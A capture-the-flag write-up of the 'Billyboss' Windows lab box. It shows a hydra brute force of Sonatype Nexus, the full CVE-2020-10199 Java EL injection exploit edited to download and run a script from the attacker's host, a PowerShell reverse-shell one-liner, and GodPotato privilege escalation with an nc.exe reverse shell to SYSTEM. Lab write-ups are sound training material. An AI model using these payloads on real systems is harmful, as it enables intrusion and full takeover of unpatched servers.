Billyboss
Enumeration:
Port Scanning:
As always we are going to start with port scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.61
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 12:09 EST
Nmap scan report for 192.168.182.61
Host is up, received echo-reply ttl 125 (0.11s latency).
Scanned at 2025-11-10 12:09:20 EST for 198s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8081/tcp open http syn-ack ttl 125 Jetty 9.4.18.v20190429
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
|_http-title: Nexus Repository Manager
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>We have ftp running on port 21, http on ports 80, and 8081, smb on port 445.
HTTP (80):
We can play and search with the upload and push functionalities, but that is not the way in:
HTTP (8081):
Here we have sonatype nexus repositry manager running.
I searched for public exploits for this specific service:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ searchsploit Sonatype Nexus
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.py
Sonatype Nexus Repository 3.53.0-01 - Path Traversal | multiple/webapps/52101.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsWe have RCE, and the version is mostly the same as ours but newer.
As stated in the title (Authenticated) so we need to login.
I tried a lot of default credentials, and searched online for specific default credentials for this, and could not login, I finally used nexus:nexus and:
Or we can use cewl to download the keywords from that page, and brute force the login form with hydra.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cewl http://192.168.182.61:8081/ --lowercase
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
nexus
repository
manager
loading
form
history
browse
spinner
logo
product
oss
ico
favicon
resources
rapture
static
http
src
image
new
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cewl http://192.168.182.61:8081/ --lowercase > words.txtWe can get the endpoint of the login request, and the parameters through burpsuite or easily with the browser developer tools under network:
We will notice the username, and password were base64 encoded.
Lets build our command and run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ hydra -L words.txt -P words.txt 192.168.182.61 http-post-form -s 8081 '/service/rapture/session:username=^USER64^&password=^PASS64^:F=403' -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these
*** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-10 12:37:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 441 login tries (l:21/p:21), ~28 tries per task
[DATA] attacking http-post-form://192.168.182.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:F=403
[8081][http-post-form] host: 192.168.182.61 login: nexus password: nexus
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-10 12:37:51We will find the same result.
Exploitation:
Now lets pull our exploit, and adjust it to fit what we want then execute it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ searchsploit -m java/webapps/49385.py
Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49385
Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
Codes: CVE-2020-10199
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Billyboss/49385.py┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cat 49385.py
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3
import sys
import base64
import requests
URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'
s = requests.Session()
print('Logging in')
body = {
'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
print('Login unsuccessful')
print(r.status_code)
sys.exit(1)
print('Logged in successfully')
body = {
'name': 'internal',
'online': True,
'storage': {
'blobStoreName': 'default',
'strictContentTypeValidation': True
},
'group': {
'memberNames': [
'$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
]
},
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
print('Command executed')
sys.exit(0)
else:
print('Error executing command, the following was returned by Nexus')
print(r.text)What we will edit is the username:password, and target url, and finally the command to run:
<snipped>
URL='http://192.168.182.61:8081'
CMD='powershell -c IEX(IWR -UseBasicParsing -Uri http://192.168.45.187:8000/shell.ps1)'
USERNAME='nexus'
PASSWORD='nexus'
<snipped>Serve our shell.ps1 file with python web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.187',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Start a netcat listener as well:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...Execute our script:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ python3 49385.py
Logging in
Logged in successfully
Command executed┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.61] 50251
PS C:\Users\nathan\Nexus\nexus-3.21.0-05>Here we have a shell.
Post-Exploitation:
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledHere we have again SeImpersonatePrivilege privilege, lets upload GodPotato and nc to the target:
PS C:\Windows\Tasks> curl http://192.168.45.187:8000/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> curl http://192.168.45.187:8000/nc.exe -o nc.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/10/2025 9:42 AM 57344 GodPotato-NET4.exe
-a---- 11/10/2025 9:42 AM 59392 nc.exeStart another netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...Run GodPotato:
PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.187 80"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\f13a5021-5994-436a-820a-c28f5c614f1c\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-1020-ffff-55e0-c644c9a86527
[*] DCOM obj OXID: 0xbf0a166078ef8da5
[*] DCOM obj OID: 0x35b17bd2aed74d00
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x764 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1508┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.61] 50266
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>set username
USERNAME=BILLYBOSS$
C:\Windows\system32>hostname
billybossHere we have a shell as system.
Get the flags:
C:\Windows\system32>type C:\Users\nathan\Desktop\local.txt
3a0141572f8eeb4591587a7616f7c54c
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
27da912b734bca4feaf77d4142d40bb1Last updated